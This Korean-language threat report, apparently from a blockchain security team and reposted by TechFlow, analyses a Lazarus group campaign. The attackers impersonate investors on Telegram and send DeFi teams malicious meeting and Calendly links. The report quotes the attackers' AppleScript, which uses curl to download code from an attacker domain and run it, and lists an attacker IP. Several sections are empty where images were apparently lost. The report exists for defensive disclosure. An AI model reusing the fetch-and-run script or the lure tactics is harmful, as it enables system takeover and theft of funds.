
만무: 북한 해커의 텔레그램 타깃 사기 공격 분석
작성자: 23pds@만무 보안팀
배경
이미 2022년에 만무 보안팀은 만무 BTI 정보 네트워크를 통해 북한 해커 라자루스(Lazarus) 그룹이 암호화폐 업계를 대상으로 광범위한 텔레그램 피싱 사기 활동을 시작한 것을 발견했다. 최근 들어 이들은 더욱 나아가 유명 투자 기관을 사칭하며 프로젝트 팀을 상대로 사기 행각을 벌이고 있다. 영향 범위가 크므로 만무는 여기에 분석을 게시한다.

기법 및 전술
1단계: 유명 투자 기관을 사칭 대상으로 선정하고, 텔레그램 가짜 계정을 생성한다:

2단계: 유명 DeFi 프로젝트 팀을 표적으로 삼아 자신들이 해당 프로젝트에 투자할 예정이라며, 가짜 계정을 사용해 사기 공격을 개시한다:

북한 해커는 먼저 목표에게 연락을 시도하여 접촉을 시도한다. 만약 프로젝트 측이 메시지를 확인하고 보안 인식이 부족하다면 아래와 같은 상황이 발생하게 된다:


북한 해커가 프로젝트 측의 신뢰를 얻은 후 미팅 일정을 제안하는데, 여기서 두 가지 공격 수법이 사용된다:
1. 프로젝트 팀을 ***.group-meeting.team 등의 회의 링크에 초대하며, 마치 면담이나 심층 논의 시간을 조율하는 것처럼 행동하면서 악성 회의 링크를 직접 제공한다. 프로젝트 관계자가 링크를 클릭하면 지역 접근 제한 메시지가 나타나고, 북한 해커는 이어 위치 수정용 악성 스크립트 다운로드 및 실행을 유도한다. 이를 실행하면 컴퓨터가 북한 해커에게 장악되어 자금이 탈취될 수 있다. 다음은 악성 스크립트 IP_Request.scpt의 내용이다:
set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"
set sc to do shell script "curl -L -k""& fix_url &"\""
run script sc
코드 설명:

2. Calendly 회의 예약 시스템의 '사용자 정의 링크 추가' 기능을 악용해 이벤트 페이지에 악성 링크를 삽입하고 피싱 공격을 개시한다. Calendly는 대부분의 프로젝트 팀이 일상적으로 사용하는 도구이므로, 이러한 악성 링크가 의심을 받기 어려우며, 프로젝트 관계자가 실수로 클릭해 악성 코드를 다운로드 및 실행하게 되면, 북한 해커는 시스템 정보 또는 권한을 획득할 수 있다.

만무 보안팀은 2023년 11월 30일에도 관련 공격 수법에 대해 경고한 바 있다:

기초 IOC:
IP: 104.168.137.21
도메인:

악성 공격 사례:


요약
이러한 사기 행위가 계속 발생하고 있는 만큼, Web3 사용자들은 친구 추가 시 반드시 이중 채널을 통해 상대방의 진위 여부를 확인해야 하며, 텔레그램에 이중 인증(2FA)을 설정하고 거래 보안에 항상 주의를 기울여 자금 피해를 입지 않도록 해야 한다.
악성 트로이 목마 실행을 실수로 실행한 경우, 즉시 관련 자금을 이전하고 인터넷 연결을 차단한 후 백신 프로그램으로 검사를 수행하며, 해당 컴퓨터(브라우저 저장 정보 포함)의 모든 관련 계정 비밀번호 등을 변경해야 한다.
TechFlow 공식 커뮤니티에 오신 것을 환영합니다
Telegram 구독 그룹:https://t.me/TechFlowDaily
트위터 공식 계정:https://x.com/TechFlowPost
트위터 영어 계정:https://x.com/BlockFlow_News














